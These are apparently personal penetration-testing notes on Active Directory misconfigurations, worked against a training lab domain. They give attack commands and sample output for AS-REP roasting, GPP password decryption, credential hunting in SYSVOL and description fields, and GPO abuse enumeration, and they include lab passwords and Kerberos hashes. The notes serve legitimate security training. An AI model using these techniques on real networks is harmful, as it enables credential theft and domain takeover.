βοΈMisconfigurations
Exchange Related Group Membership
In a default installation of Microsoft Exchange within an AD environment it will be given many privileges within the domain. The group Exchange Windows Permission is not listed as a protected group but members are given the ability to write a DACL to the domain object.
An attacker can use this to add accounts to this group via a DACAL misconfiguration.
More techniques can be found here
The Exchange Group Organization Management is another powerful group that can access the mailboxes of all domain users. Sysadmins are usually members of the group. If we can compromise an Exchange server it will often lead to Domain Admin privileges. We should also be aware that dumping creds will often lead to 100's of cleartext credentials or NTLM hashes!
PrivExchange
These attacks are flaws in the Exchange Server PushSubscription feature, which allows any domain user with a mailbox to force the Exchange server to authenticate to any host provided by the client over HTTP.
Printer Bug
A flaw in the MS-RPRN protocol (Print System Remote Protocol).
To leverage this flaw any domain user can connect to the spools named pipe with the RpcOpenPrinter methods and the RpcRemoteFindFirstPrinterChangeNotificationEx method and force the server to authenticate to any host provided by the client over SMB.
Enumerating for MS-PRN Printer Bug
We can use Get-SpoolStats from the SecurityAssesment tool to check for vulnerable machines
Import-Module .\SecurityAssessment.ps1
Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCALMS14-068
A flaw in Kerberos which can be leveraged with standard domain user creds to elevate privileges to Domain Admin. A Kerberos ticket contains information about a user, including the account name, ID, and group membership in the Privilege Attribute Certificate (PAC). The PAC is signed by the KDC using secret keys to validate that the PAC has not been tampered with after creation.
This allowed a forged PAC to be accepted by the KDC as legitimate. We can create a fake PAC, presenting a user as a member of the Domain Administrators or other privileged group. The tools such as the Python Kerberos Exploitation Kit (PyKEK) or the Impacket toolkit can be used to exploit this.
Sniffing LDAP Credentials
Many applications and printers store LDAP cred in their web admin console to connect to the domain. The consoles often have weak or default passwords and sometimes are even cleartext. Some applications have a test function that means we can gather credentials by changing the LDAP IP address to our attack host IP.
Enumerating DNS Records
We can use https://github.com/dirkjanm/adidnsdump to enumerate all DNS records in a domain using a valid user account. By default, all users can list the child objects of a DNS zone in an AD environment, the tool uses this to resolve al records in the zone and tries to find something useful for our engagement.
Using adidnsdump
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 recordsViewing the Contents of the records file
head records.csv
type,name,value
?,LOGISTICS,?
AAAA,ForestDnsZones,dead:beef::7442:c49d:e1d7:2691
.....Using the -r option to Resolve Unknown Records
If we run the tool with the -r option it will attempt to resolve unknown records by performing an A query.
adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 27 recordsPassword in Description Field
Sometimes sensitive information is found in the user account Description or Notes fields.
Finding Passwords in the Description Field
We can use PowerView to quickly search through large domains
Get-DomainUser * | Select-Object samaccountname,description |Where-Object {$_.Description -ne $null}PASSWD_NOTREQD Field
Some domain accounts may have the field passwd_notreqd set, if this is found it means the users could have a shorter password or no password set at all.
Checking for PASSWD_NOTREQD Setting
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrolCredentials in SMB Shares and SYSVOL Scripts
It can be a treasure trove of data, especially in large organizations. It may also contain different batch scripts within the scripts directory. Sometimes we can find very old scripts containing disabled accounts or old passwords.
Example Discovering an Interesting Script
ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts
..
-a---- 3/8/2022 2:56 PM 979 reset_local_admin_pass.vbs
cat \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts\reset_local_admin_pass.vbs
On Error Resume Next
strComputer = "."
Set oShell = CreateObject("WScript.Shell")
sUser = "Administrator"
sPwd = "!ILFREIGHT_L0cALADmin!"
Set Arg = WScript.Arguments
If Arg.Count > 0 Then
sPwd = Arg(0) 'Pass the password as parameter to the script
End if
'Get the administrator name
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
<SNIP> Group Policy Preferences (GPP) Passwords
When a new GPP is created in an.xml file is created in the SYSVOL share, which is also locally cached on endpoints that the Group Policy applies to. These file include
Map drives (drives.xml)
Create local users
Create printer config files (printers.xml)
Creating and updating services (services.xml)
Creating scheduled tasks (scheduledtasks.xml)
Changing local admin passwords.
They contain an array of config data and defined passwords.
The XML looks like the following
Decrypting the Password with gpp-decrypt
If we retrieve the cpassword value, we can decrypt it with gpp-decrypt
gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaELocating GPP Passwords with CME
GPP password can located by searching the SYSVOL share or using tools like https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 and CrackMapExec.
crackmapexec smb -L | grep gpp
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.Using CME's gpp_autologin Module
We can also find password in files such a Registry.xml when autologon is configured via Group Policy.
crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologinAS-REP Roasting
Occurs when a user account has the privilege βDoes not require Pre-Authenticationβ set. The account does not need to provide valid identification before requesting a ticket.
Viewing an Account with the Do not Require Kerberos Preauthentication Option
Enumerating for DONT_REQ_PREAUTH Value using Get-DomainUser
We can use PowerView to enumerate users with their UAC value set to DONT_REQ_PREAUTH
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | flRetrieving AS-REP in Proper Format with Rubeus
With Rubeus we can try to obtain the ticket for the target account. If an attacker has GenericWrite or GenericAll permissions over an account, they can enable this attribute and obtain the AS-REP ticket for offline cracking to recover the account's password before disabling the attribute again.
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcatCracking the Hash with Hashcat
With the mode set to -m 18200 we can attempt to crack the hash
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txtRetrieving the AS-REP Using Kerbrute
This tool will automatically retrieve the AS-REP for any users found that do not require Kerberos pre-auth.
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 04/01/22 - Ronnie Flathers @ropnop
2022/04/01 13:14:17 > Using KDC(s):
2022/04/01 13:14:17 > 172.16.5.5:88
2022/04/01 13:14:17 > [+] VALID USERNAME: sbrown@inlanefreight.local
2022/04/01 13:14:17 > [+] mmorgan has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:400d306dda575be3d429aad39ec68a33$8698ee566cde591a7ddd1782db6f7ed8531e266befed4856b9fcbbdda83a0c9c5ae4217b9a43d322ef35a6a22ab4cbc86e55a1fa122a9f5cb22596084d6198454f1df2662cb00f513d8dc3b8e462b51e8431435b92c87d200da7065157a6b24ec5bc0090e7cf778ae036c6781cc7b94492e031a9c076067afc434aa98e831e6b3bff26f52498279a833b04170b7a4e7583a71299965c48a918e5d72b5c4e9b2ccb9cf7d793ef322047127f01fd32bf6e3bb5053ce9a4bf82c53716b1cee8f2855ed69c3b92098b255cc1c5cad5cd1a09303d83e60e3a03abee0a1bb5152192f3134de1c0b73246b00f8ef06c792626fd2be6ca7af52ac4453e6a
...Hunting for Users with Kerberos Pre-auth Not Required
With a valid list of users, we can use the below tool to hunt for all users with Kerberos pre-auth not required.
GetNPUsers.py INLANEFREIGHT.LOCAL/ -dc-ip 172.16.5.5 -no-pass -usersfile valid_ad_users
[-] User asanchez@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dlewis@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ccruz@inlanefreight.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$mmorgan@inlanefreight.local@INLANEFREIGHT.LOCAL:47e0d517f2a5815da8345dd9247a0e3d$b62d45bc3c0f4c306402a205ebdbbc623d77ad016e657337630c70f651451400329545fb634c9d329ed024ef145bdc2afd4af498b2f0092766effe6ae12b3c3beac28e6ded0b542e85d3fe52467945d98a722cb52e2b37325a53829ecf127d10ee98f8a583d7912e6ae3c702b946b65153bac16c97b7f8f2d4c2811b7feba92d8bd99cdeacc8114289573ef225f7c2913647db68aafc43a1c98aa032c123b2c9db06d49229c9de94b4b476733a5f3dc5cc1bd7a9a34c18948edf8c9c124c52a36b71d2b1ed40e081abbfee564da3a0ebc734781fdae75d3882f3d1d68afdb2ccb135028d70d1aa3c0883165b3321e7a1c5c8d7c215f12da8bba9
Group Policy Object (GPO) Abuse
Group Policy provides admins with many advanced settings that can be applied to both user and computer object in an AD environment. If we gain rights over a GPO via an ACL misconfiguration, we could leverage this for lateral movement, privilege escalation and even domain compromise.
GPO misconfigurations can be abused to perform the following attacks:
Adding additional rights to a user (such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeImpersonatePrivilege)
Adding a local admin user to one or more hosts
Creating an immediate scheduled task to perform any number of actions
Enumerating GPO Names with PowerView
We can use PowerView to enumerate GPO information and get a listing of GPOs by name
Get-DomainGPO |select displaynameEnumerating GPO Names with PowerShell
Get-GPO -All | Select DisplayNameEnumerating Domain User GPO Rights
We can check if a user has any rights over a GPO, a good first check is to see if the entire Domain Users Group has any rights over one or more GPOs.
We should look out for permissions such as WriteProperty and WriteDacl, as we can leverage these to give ourselves full control over the GPO.
$sid=Convert-NameToSid "Domain Users"
Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}Converting GPO GUID to Name
We can get the display name of the GPO using the Get-GPO function
Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532Last updated
Was this helpful?